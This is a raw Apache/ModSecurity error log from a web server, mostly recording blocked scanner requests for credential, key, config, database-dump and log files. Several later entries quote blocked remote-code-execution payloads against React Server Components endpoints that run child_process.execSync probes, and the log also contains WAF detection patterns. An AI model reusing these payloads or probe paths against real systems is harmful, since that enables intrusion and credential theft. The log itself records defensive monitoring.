.db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aaEuRs_7XKceGHnFn7KN5gAAAQI"] [Fri Feb 27 07:40:22.988414 2026] [:error] [pid 19590:tid 19613] [client 185.177.72.52:13390] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/server.key"] [unique_id "aaEuRtky4CVhPBJ_vGvrhQAAANU"] [Fri Feb 27 07:40:23.185853 2026] [:error] [pid 19414:tid 19495] [client 185.177.72.52:13394] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php5.ini"] [unique_id "aaEuR4l2XTe6vwfq2aEjvQAAABQ"] [Fri Feb 27 07:40:25.364963 2026] [:error] [pid 19590:tid 19612] [client 185.177.72.52:33122] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/config.ini"] [unique_id "aaEuSdky4CVhPBJ_vGvrjAAAANQ"] [Fri Feb 27 07:40:25.564702 2026] [:error] [pid 19590:tid 19604] [client 185.177.72.52:33138] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.aws/credentials.bak"] [unique_id "aaEuSdky4CVhPBJ_vGvrjwAAAMw"] [Fri Feb 27 07:40:25.949053 2026] [:error] [pid 19590:tid 19603] [client 185.177.72.52:33162] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.bak"] [unique_id "aaEuSdky4CVhPBJ_vGvrkgAAAMs"] [Fri Feb 27 07:40:33.084407 2026] [authz_core:error] [pid 21508:tid 21527] [client 185.177.72.52:33526] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/.htaccess [Fri Feb 27 07:41:13.112646 2026] [access_compat:error] [pid 19414:tid 19475] [client 185.177.72.52:43000] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env [Fri Feb 27 07:41:13.141820 2026] [access_compat:error] [pid 19414:tid 19489] [client 185.177.72.52:43000] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase [Fri Feb 27 07:41:13.158366 2026] [access_compat:error] [pid 19414:tid 19485] [client 185.177.72.52:43000] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/persistence [Fri Feb 27 07:41:13.177232 2026] [access_compat:error] [pid 19414:tid 19499] [client 185.177.72.52:43000] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/src [Fri Feb 27 07:41:16.386015 2026] [:error] [pid 19419:tid 19544] [client 185.177.72.52:52240] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db.sql"] [unique_id "aaEufJIw8I6Qp-4wONXI_QAAAI4"] [Fri Feb 27 07:41:16.394493 2026] [:error] [pid 19419:tid 19530] [client 185.177.72.52:52240] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aaEufJIw8I6Qp-4wONXI_gAAAIc"] [Fri Feb 27 07:41:16.778234 2026] [:error] [pid 21508:tid 21529] [client 185.177.72.52:52252] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aaEufM_7XKceGHnFn7KPSQAAAQc"] [Fri Feb 27 07:41:25.886777 2026] [:error] [pid 19590:tid 19616] [client 185.177.72.52:26302] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/dump.sql"] [unique_id "aaEuhdky4CVhPBJ_vGvsrwAAANg"] [Fri Feb 27 07:41:28.335802 2026] [:error] [pid 21508:tid 21534] [client 185.177.72.52:26428] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aaEuiM_7XKceGHnFn7KPggAAAQw"] [Fri Feb 27 07:42:03.014212 2026] [:error] [pid 19414:tid 19487] [client 185.177.72.52:22182] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/log/development.log"] [unique_id "aaEuq4l2XTe6vwfq2aEkCQAAAAw"] [Fri Feb 27 07:42:03.986907 2026] [:error] [pid 19590:tid 19592] [client 185.177.72.52:22244] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/access.log"] [unique_id "aaEuq9ky4CVhPBJ_vGvtmwAAAMA"] [Fri Feb 27 07:42:03.997045 2026] [:error] [pid 19590:tid 19601] [client 185.177.72.52:22244] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/app.log"] [unique_id "aaEuq9ky4CVhPBJ_vGvtnAAAAMk"] [Fri Feb 27 07:42:04.020769 2026] [:error] [pid 19590:tid 19598] [client 185.177.72.52:22244] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/logs/error.log"] [unique_id "aaEurNky4CVhPBJ_vGvtnQAAAMY"] [Fri Feb 27 07:42:18.982582 2026] [:error] [pid 19415:tid 19524] [client 185.177.72.52:51972] [client 185.177.72.52] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php.ini"] [unique_id "aaEuuq1cZkWaKliZo9PiNgAAAE8"] [Fri Feb 27 15:28:40.223954 2026] [:error] [pid 19419:tid 19545] [client 20.104.124.39:35770] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Feb 28 01:24:42.304713 2026] [:error] [pid 21508:tid 21523] [client 20.104.82.189:11201] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Feb 28 23:14:55.471559 2026] [:error] [pid 12407:tid 12460] [client 20.104.124.39:18597] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Mon Mar 02 16:08:16.092516 2026] [:error] [pid 20707:tid 20719] [client 18.202.217.12:48640] [client 18.202.217.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:[\\"\\\\'].*?[,].*(((v|(\\\\\\\\u0076)|(\\\\166)|(\\\\x76))[^a-z0-9]*(a|(\\\\\\\\u0061)|(\\\\141)|(\\\\x61))[^a-z0-9]*(l|(\\\\\\\\u006C)|(\\\\154)|(\\\\x6C))[^a-z0-9]*(u|(\\\\\\\\u0075)|(\\\\165)|(\\\\x75))[^a-z0-9]*(e|(\\\\\\\\u0065)|(\\\\145)|(\\\\x65))[^a-z0-9]*(O|(\\\\\\\\u004F)|(\\\\117)|(\\\\ ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "504"] [id "973347"] [rev "2"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: \\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('(whoami) 2>&1 || true',{'timeout':5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'), {digest: found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:..."] [ve [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaWZz29rPG1rCPhdkiH7qAAAAMo"] [Tue Mar 03 03:59:12.331974 2026] [:error] [pid 21979:tid 21981] [client 172.94.9.249:47536] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/graphql"] [unique_id "aaZAcP2xhCLtpShpTOoykgAAAMA"] [Tue Mar 03 03:59:12.331974 2026] [:error] [pid 21979:tid 21984] [client 172.94.9.249:47546] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aaZAcP2xhCLtpShpTOoykwAAAMM"] [Tue Mar 03 03:59:12.331990 2026] [:error] [pid 21862:tid 21922] [client 172.94.9.249:47508] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/_rsc"] [unique_id "aaZAcPh_lrWoDSo4I3RnvAAAAI0"] [Tue Mar 03 03:59:12.331990 2026] [:error] [pid 21862:tid 21932] [client 172.94.9.249:47562] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/rsc"] [unique_id "aaZAcPh_lrWoDSo4I3RnvQAAAJI"] [Tue 